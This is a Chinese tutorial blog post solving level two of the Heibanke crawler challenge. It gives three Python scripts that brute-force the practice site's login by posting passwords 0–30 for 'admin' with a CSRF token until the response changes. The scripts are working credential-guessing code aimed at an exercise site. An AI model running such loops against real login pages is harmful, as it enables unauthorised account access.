Python黑板客爬虫闯关二

来到第二题，此题是输入昵称和密码，进行登陆。昵称随便，密码是30以内的数字。此题如图

我们需要用Python爬虫方面的知识，这里有两种方法来实现

一、用requests库和re正则表达式来完成

1、requests库进行得到网页

2、re 正则表达式来匹配内容

3、此题的思路是用requests.post()请求和 for循环来实现从0到30的输入。

随即输入昵称和密码后，在F12控制台找到post请求，如下图

此题的Form Data里的csrmiddlewaretoken的值是固定是 nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F。

不随着你输入的username 和password而改变。所以可以用下边的代码1。

如果Form Data里的csrmiddlewaretoken的值是变化的，可以写个函数从Cookie里的得到，代码如代码2

具体代码如下

代码1、Form Data里的csrmiddlewaretoken的值是固定的

import requests
import re
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                         "Chrome/68.0.3440.106 Safari/537.36"}


def attack(password):
    url = "http://www.heibanke.com/lesson/crawler_ex01/"
    data = {
           "csrfmiddlewaretoken": "nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F",
           "username": "admin",
           "password": password,
    }
    # nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F
    response = requests.post(url, headers=headers, data=data)
    html = re.findall(r'<h3>(.*?)</h3>', response.text)
    print(html[0])


def main():
    for password in range(31):
        print(password)
        attack(password)


main()

代码2、Form Data里的csrmiddlewaretoken的值是不固定的(固定也能用此代码)

import requests
import re

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
}


def get_csrf():
    url = 'http://www.heibanke.com/lesson/crawler_ex01/'
    response = requests.get(url, headers=headers)
    response = str(response.headers)
    csrf = re.findall('csrftoken=(.*?);', response)
    return csrf[0]


def attack(csrf, password):
    data = {
        "csrfmiddlewaretoken": csrf,
        "username": "admin",
        "password": password,
    }
    url = 'http://www.heibanke.com/lesson/crawler_ex01/'
    response = requests.post(url, headers=headers, data=data).text
    info = re.findall('<h3>(.*?)</h3>', response)
    print(info[0])


def main():
    csrf = get_csrf()
    for password in range(31):
        print(password)
        attack(csrf, password)


main()

运行结果如下，可以得到密码

二、用urllib.request、http.cookiejar、bs4库来实现

代码如下

import bs4
from bs4 import BeautifulSoup
import urllib.request
import http.cookiejar

url = "http://www.heibanke.com/lesson/crawler_ex01/"
cj = http.cookiejar.LWPCookieJar()
cookie_support = urllib.request.HTTPCookieProcessor(cj)
opener = urllib.request.build_opener(cookie_support, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)

data = urllib.request.urlopen(url).read()
data = data.decode('utf-8')
# headers和postData分析自抓包
headers = {
    'Accept': 'text/html, application/xhtml+xml, image/jxr',
    'Referer': 'http://www.heibanke.com/lesson/crawler_ex01/',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'
    }
password = 0
while True:
    postData = {
    'csrfmiddlewaretoken' : 'sczCT2OaFZ5BAxTXR0rBNSFuqummuY2y',
    'username' : 'admin',
    'password' : password
    }
    postData = urllib.parse.urlencode(postData)
    postData = postData.encode('utf-8')
    # 进行编码，否则会报POST data should be bytes or an iterable of bytes. It cannot be str.错误.
    req = urllib.request.Request(url, postData, headers)
    print(req)
    response = urllib.request.urlopen(req)
    text = response.read().decode('utf-8')
    #print(text)
    soup = BeautifulSoup(text, "lxml")
    msg = soup.body.h3.string
    if msg == "您输入的密码错误, 请重新输入":
        password += 1
        continue
    else:
        print(msg)
        print("password is : " + str(password))
        break
    #print(data)

运行结果如下

点击链接 https://blog.csdn.net/Ljt101222/article/details/82428351 进入 Python黑板客爬虫闯关三

Python黑板客爬虫闯关二

猜你喜欢